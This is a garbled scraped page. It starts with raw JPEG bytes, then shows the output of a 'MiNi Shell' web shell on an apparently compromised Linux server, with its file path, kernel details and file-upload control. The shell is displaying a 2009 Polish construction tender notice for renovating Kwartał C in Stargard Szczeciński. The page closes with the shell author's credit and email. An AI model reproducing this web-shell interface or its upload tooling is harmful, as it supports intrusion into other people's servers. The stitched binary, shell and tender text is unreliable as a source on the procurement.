JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090723/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090723/251016-N-2009.html

<p class="kh_header"><b>Stargard Szczeciński: Renowacja Kwartwłu C</b><br>
<b>Numer ogłoszenia: 251016 - 2009; data zamieszczenia: 23.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Stargardzkie Towarzystwo Budownictwa Społecznego Sp.z o.o. , ul. A. Struga 29, 73-110 Stargard Szczeciński, woj. zachodniopomorskie, tel. 091 5784750, faks 091 577 15 35.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tbs.stargard.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa osoba prawna - spółka prawa handlowego gminy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Renowacja Kwartwłu C.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje wszelkie prace i czynności niezbędne do wykonania  renowacji części Kwartału C (działki geodez. nr 543,649/2, 649/3, 649/11, 649/14- obręb 6) w zakresie Etapu I i Etapu II:
1. Etap I to:
1.1. Rozbiórka dwupiętrowej podpiwniczonej kamienicy przy ul. A. Mickiewicza 1 o kubaturze  1892 m3 i wszystkich komórek gospodarczych (murowanych). 
1.2. Renowacja tworzących pierzeję uliczną czterech istniejących jednopiętrowych budynków (jednoklatkowych, podpiwniczonych)  na posesjach ul. Wojska Polskiego 2, 4, 6 i 8 w wyniku której powstaną 22 mieszkania o powierzchni użytkowej 971,32 m2 oraz 12 lokali usługowych o powierzchni użytkowej 589,92m2,
1.2.1.Rewaloryzacja (remont, przebudowa, nadbudowa, rozbudowa) budynków to przede wszystkim:
-  naprawa i częściowe podbijanie fundamentów,
-  częściowe wyburzenia istniejących ścian i rozbiórki stropów, 
-  częściowa wymiana stropów na żelbetowe wylewane na budowie,
-  wymiana klatek schodowych na żelbetowe wylewane na budowie,
-  naprawa i przemurowania istniejących ścian,
-  naprawy, wzmocnienie, ewentualna wymiana nadproży otworów okiennych i drzwiowych,
-  rozebranie istniejących konstrukcji dachowych oraz ścianek kolankowych,
-  wykonanie nowych ścianek kolankowych nowych kondygnacji mieszkalnych,
-  nowe więźby dachowe o konstrukcji drewnianej,
-  płyty balkonowe żelbetowe mocowane do istniejącej konstrukcji budynków,
- wykonanie nowych instalacji wewnętrznych (ciepłej, zimnej wody i cyrkulacji c.c.w., c.o., kanalizacji sanitarnej, elektrycznej, telefonicznej, domofonowej, rurażu TV, wentylacji grawitacyjnej, wentylacji mechanicznej w pomieszczeniach: węzłów cieplnych, komory śmieciowej i suszarni oraz kanałów wentylacji mechanicznej dla lokali usługowych.
1.3.Budowa, w części kwartału przylegającej do pierzei ul. Wojska Polskiego, dwupoziomowej części garażu mieszczącej 46 miejsc postojowych. 
 Instalacje wewnętrzne; kanalizacja sanitarna, kanalizacja  deszczowa (odwodnienie dachu garażu), instalacja elektryczna (oświetlenia ogólnego, ewakuacyjnego oraz zasilania i sterowania instalacją wentylacji mechanicznej), wentylacja mechaniczna, p. poż. (hydranty).   
1.4. Zagospodarowania terenu przynależnego do budynków (w tym części dachu garażu): oświetlenie, parkingi  i droga, chodniki (nawierzchnie utwardzone ogółem  ok. 296,02m2), mała architektura, roślinność (ok. 279,41m2).
1.5. Budowa przyłączy: wodociągowego, kanalizacji deszczowej, kanalizacji sanitarnej, centralnego ogrzewania 
2. Etap II to:
2.1.Rozbiórka 3-kondygnacyjnej kamienicy (bez podpiwniczenia) o kubaturze 1798 m3, położonej przy ul. J. Piłsudskiego 104.
2.2.Renowacja trzech istniejących budynków na posesjach ul. J. Piłsudskiego 101,102,103, wyniku której powstanie 27 mieszkań o powierzchni użytkowej 1252,05m2 oraz 6 lokali usługowych o powierzchni użytkowej 292,53m2,
2.2.1.Rewaloryzacja (remont, przebudowa, nadbudowa, rozbudowa) budynków przy ul. J. Piłsudskiego 101,102,103  to  przede wszystkim:
- naprawa i częściowe podbijanie fundamentów,
- częściowe wyburzenia istniejących ścian i rozbiórki stropów,
- częściowa wymiana stropów na żelbetowe wylewane na budowie,
- wymiana klatek schodowych na  żelbetowe wylewane na budowie,
- naprawa i przemurowania istniejących ścian,
- naprawy, wzmocnienia, ewentualnie wymiana nadproży otworów okiennych i drzwiowych,
- rozebranie istniejących konstrukcji dachowych oraz ścianek kolankowych,
- wykonanie nowych ścianek kolankowych nowych kondygnacji mieszkalnych,
- nowe więźby dachowe o konstrukcji drewnianej,
- płyty balkonowe żelbetowe mocowane do istniejącej konstrukcji budynków,
- wykonanie nowych instalacji wewnętrznych (ciepłej, zimnej wody i cyrkulacji c.c.w., c.o., kanalizacji sanitarnej, elektrycznej, telefonicznej, domofonowej, rurażu TV, wentylacji grawitacyjnej, oddymiania klatek schodowych, wentylacji mechanicznej w pomieszczeniach: węzłów cieplnych, komory śmieciowej i suszarni oraz kanałów wentylacji mechanicznej dla lokali usługowych.
2.3. Budowa kamienicy  narożnej w miejsce rozebranych kamienic przy ul.  J. Piłsudskiego 104 i ul. A. Mickiewicza 1.
2.3.1.Budynek 4- kondygnacyjny bez podpiwniczenia z dwiema klatkami schodowymi, mieszczący 21 mieszkań o pow. użytkowej 933,14 m2 oraz 5 lokali usługowych o pow. użytkowej 193,38m2. Kubatura budynku 5 555m3.
Technologia tradycyjna, układ konstrukcyjny ścian mieszany. Ławy fundamentowe, ściany fundamentowe, fragmenty parterów, stropy, klatki schodowe,  w konstrukcji wylewanej żelbetowej. Dach w technologii stalowo-drewnianej kryty termozgrzewalnymi powłokami bitumicznymi i częściowo blachą tytanowo-cynkową.
Budynek wyposażony w instalacje wewnętrzne: ciepłej, zimnej wody i cyrkulacji c.c.w., c.o., kanalizacji sanitarnej, elektrycznej, telefonicznej, telewizyjnej, domofonowej, wentylacji grawitacyjnej i kanały wentylacji mechanicznej dla lokali usługowych).
2.4.Budowa, w części kwartału przylegającej do pierzei ul. J. Piłsudskiego,  jednopoziomowej części garażu mieszczącej 30 miejsc postojowych. Instalacje wewnętrzne; kanalizacja sanitarna, kanalizacja  deszczowa, instalacja elektryczna (oświetlenia ogólnego, ewakuacyjnego oraz zasilania i sterowania instalacją wentylacji mechanicznej), wentylacja mechaniczna, p. poż. (hydranty).   
2.5.Zagospodarowanie terenu (w tym części dachu garażu): oświetlenie, parkingi  i droga manewrowa, chodniki (nawierzchnie utwardzone ogółem  ok. 515,02m2), mała architektura, roślinność (ok. 644,38m2).
2.6. Budowa przyłączy: wodociągowego, kanalizacji deszczowej, kanalizacji sanitarnej, sieci kanalizacji deszczowej, centralnego ogrzewania..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.00.00-1, 45.21.00.00-2, 45.23.00.00-8, 45.31.00.00-3, 45.32.00.00-6, 45.33.00.00-9, 45.41.00.00-4, 45.42.00.00-7, 45.43.00.00-0, 45.44.00.00-3, 45.45.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 20.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający żąda od wykonawców wniesienia wadium w kwocie 200 000,00 zł.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy,  którzy spełnią niżej wymienione warunki udziału w postępowaniu:
1. Nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust.1 i 2 ustawy Prawo zamówień publicznych.
Ocena spełnienia warunku nastąpi na podstawie przedstawionych przez wykonawcę oświadczeń i dokumentów wymienionych w pkt. 1,2,3, 4,5 Informacji o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu .
Każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia musi wykazać  spełnienie warunku.

2. Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, a w szczególności wykażą że:
a)  W okresie ostatnich pięciu lat przed dniem wszczęcia postępowania, a jeżeli okres działalności jest krótszy w tym okresie, wykonali  roboty budowlane odpowiadające swoim rodzajem i wartością przedmiotowi zamówienia. Za roboty budowlane odpowiadające swoim rodzajem i wartością przedmiotowi zamówienia zamawiający uzna roboty budowlane związane z budynkami o łącznej wartości min. 20 mln zł, w tym co najmniej: jedną robotę o wartości min. 3 ml zł polegającą na  budowie lub remoncie lub przebudowie lub nadbudowie lub rozbudowie lub odbudowie  budynku mieszkalnego oraz jedną robotę polegającą na budowie części budynku lub całego budynku  o konstrukcji żelbetowej monolitycznej i kubaturze min. 3200m3. 
b)   Dysponują lub będą dysponować: 
 -   kierownikiem budowy posiadającym uprawnienia budowlane w specjalności konstrukcyjno-budowlanej i co najmniej 3 letnim doświadczeniem w pełnieniu funkcji kierownika budowy, w tym pełnienie funkcji kierownika budowy części budynku lub całego budynku o konstrukcji żelbetowej monolitycznej i kubaturze min. 3200,00m3,
-kierownikami robót w specjalnościach: elektrycznej, sanitarnej, z których każdy legitymuje się co najmniej 2 letnim doświadczeniem w pełnieniu funkcji kierownika budowy/ kierownika robót wewnętrznych i zewnętrznych w danej branży.
Ocena spełnienia warunków nastąpi na podstawie przedstawionych przez wykonawcę dokumentów i oświadczeń, o których mowa w pkt. 6 i 7 Informacji o oświadczeniach i dokumentach..... 
Wykonawcy wspólnie ubiegających się o udzielenie zamówienia muszą wykazać, że spełniają warunki łącznie.
3. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, a w szczególności wykażą że:
a) osiągnęli w okresie ostatnich trzech lat obrotowych, a jeżeli okres działalności jest krótszy w tym okresie, łączny przychód netto ze sprzedaży w wysokości min. 30 mln złotych,    
b)  uzyskali za okres ostatnich trzech lat obrotowych, a jeżeli okres działalności jest  krótszy w tym okresie, wskaźnik płynności bieżącej (WPB) nie mniejszy niż 1,2
wskaźnik liczony będzie z dokładnością do dwóch miejsc po przecinku wg wzoru 
WPB = AO : ZK 
gdzie: 
AO -aktywa obrotowe z wyłączeniem krótkoterminowych rozliczeń międzyokresowych,
ZK - zobowiązania krótkoterminowe,
c)  uzyskali za okres ostatnich trzech lat obrotowych, a jeżeli okres działalności jest krótszy w tym okresie, wskaźnik zadłużenia aktywów (WZA) nie większy niż 0,8
wskaźnik liczony będzie z dokładnością do dwóch miejsc po przecinku wg wzoru 
	WZA = ZO : AO 
	gdzie: 
	ZO - zobowiązania ogółem, z wyłączeniem rezerw na zobowiązania i rozliczeń międzyokresowych,
	A O-  aktywa ogółem,
d)  dysponują środkami finansowymi lub posiadają zdolność kredytową w  kwocie min. 800 tys. złotych.
Ocena spełnienia warunków nastąpi na podstawie przedstawionych przez wykonawcę dokumentów, o których mowa w  pkt. 8 i 9 Informacji o oświadczeniach i dokumentach....

W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia warunki, o których mowa pod lit. b), c) muszą być spełnione przez każdego z wykonawców wspólnie ubiegających się o udzielenie zamówienia. Spełnienie warunków,  o których mowa pod lit. a) i d) wykonawcy winni wykazać łącznie. 
Wskaźniki, o których mowa pod lit. b) i c) policzone zostaną poprzez podstawienie do wzorów wartości wynikających z sumy odpowiednich wielkości (za żądany okres) ze sprawozdań finansowych lub innych dokumentów w przypadku wykonawców nie zobowiązanych do sporządzania sprawozdań finansowych.
Spełnienie przez wykonawcę warunków udziału w przetargu oceniane będzie wg formuły:  spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełnienia warunków udziału w przetargu wykonawca winien przedłożyć:
1. Aktualny odpis z właściwego  rejestru lub aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wydane nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Dokument składa każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia.
2. Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego o braku zaległości w uiszczaniu podatku i opłat lub zaświadczenie potwierdzające, że wykonawca uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie  wcześniej  niż 3 miesiące przed upływem terminu składania ofert. Dokument składa każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia.
3.  Zaświadczenie właściwego dla wykonawcy oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego o braku zaległości w uiszczaniu składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenie potwierdzające, że wykonawca uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie  wcześniej  niż 3 miesiące przed upływem terminu składania ofert.
Dokument składa każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia. 
4.  Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Dokument składa każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia.
5.  Aktualną  informację z Krajowego Rejestru Karnego w zakresie określonym art. 24 ust. 1 pkt. 9 ustawy (podmiot zbiorowy), wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Dokument składa każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia nie będący osobą fizyczną.  
6. Wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania, a jeżeli okres działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością przedmiotowi zamówienia  - Formularz   nr 2. 
6.1.Referencje lub inne dokumenty potwierdzające należyte wykonanie wykazanych robót.
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają wspólny wykaz robót wraz z dokumentami, o których mowa w ppkt. 6 1. 
7. Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca, i które są przewidziane do pełnienia funkcji kierowniczych przy realizacji zamówienia wraz z informacją odnośnie ich doświadczenia - Formularz nr 3.
7.1. Uprawnienia budowlane osób przewidzianych do pełnienia funkcji kierowniczych.  
7.2.Ważne w dacie złożenia oferty zaświadczenia o wpisie na listę członków właściwej izby samorządu zawodowego, osób przewidzianych do pełnienia funkcji kierowniczych.
7.3.Pisemne zobowiązanie innych podmiotów do udostępnienia osób przewidzianych do pełnienia funkcji kierowniczych, jeżeli w wykazie, o którym mowa w pkt.7 wykonawca wskazał osoby, którymi będzie dysponował, a nie będące jego pracownikami. W przypadku prowadzenia przez te osoby samodzielnej działalności należy do oferty załączyć pisemne zobowiązanie tych osób do podjęcia się pełnienia określonej funkcji .
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają wspólny wykaz osób wraz z dokumentami, o których mowa w ppk. od  7.1. do 7.3. 
8.  Sprawozdania finansowe, a jeżeli podlega ono badaniu przez  biegłego rewidenta zgodnie z przepisami o rachunkowości również opinię o badanym sprawozdaniu, a w przypadku wykonawców nie zobowiązanych do sporządzania sprawozdania finansowego, inne dokumenty określające obroty oraz zobowiązania i należności za ostatnie 3 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy- za ten okres.
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty składa każdy wykonawca. 
9. Informację banku lub spółdzielczej kasy oszczędnościowo -kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument składa wykonawca/wykonawcy wykazujący spełnienie warunku.
10. Oświadczenie o spełnieniu warunków wynikających z art. 22 ust. 1, w tym o nie podleganiu wykluczeniu na podstawie art. 24 ust. 1 i 2 Pzp -Formularz nr 4.
W imieniu wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie może złożyć pełnomocnik.
11.Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej:
a) zamiast dokumentów, o których mowa w pkt. 1, 2, 3 i 5  składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a. nie otwarto jego likwidacji  ani nie ogłoszono upadłości,
b. nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie  lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
c. nie orzeczono wobec niego zakazu ubiegania się o zamówienie, przy czym dokumenty, o których mowa pod lit. a. i c. powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a dokument, o którym mowa pod lit. b) powinien być wystawiony nie wcześniej niż 3 miesięcy przed upływem terminu składania ofert,  
b) zamiast dokumentu, o którym mowa w pkt. 4 , składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust.1 pkt 4-8 ustawy przy czym dokument ten powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
c) zamiast dokumentów, o których mowa w pkt.7 ppkt.7.1. i 7.2. przedkłada uprawnienia lub wpis na listę członków właściwej organizacji samorządu zawodowego w państwie członkowskim Unii Europejskiej, w którym ma siedzibę. 
12.Jeżeli w kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub  miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 11 lit. a) i b) niniejszego rozdziału, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Zapisy pkt. 11 dotyczące  terminu wystawienia dokumentów stosuje się odpowiednio..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.tbs.stargard.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Stargardzkie TBS Sp. z o.o. ul. Struga 29 pok.19  73-110 Stargard Szczeciński.
Opłata za SIWZ wynosi 3 000,60 zł i zostanie powiększona o ewentualne koszty przekazania SIWZ wykonawcy..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.08.2009 godzina 13:00, miejsce: Stargardzkie TBS Sp. z o. o.
ul. Struga 29 pok. 3 (sekretariat)
73-110 Stargard Szczeciński.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com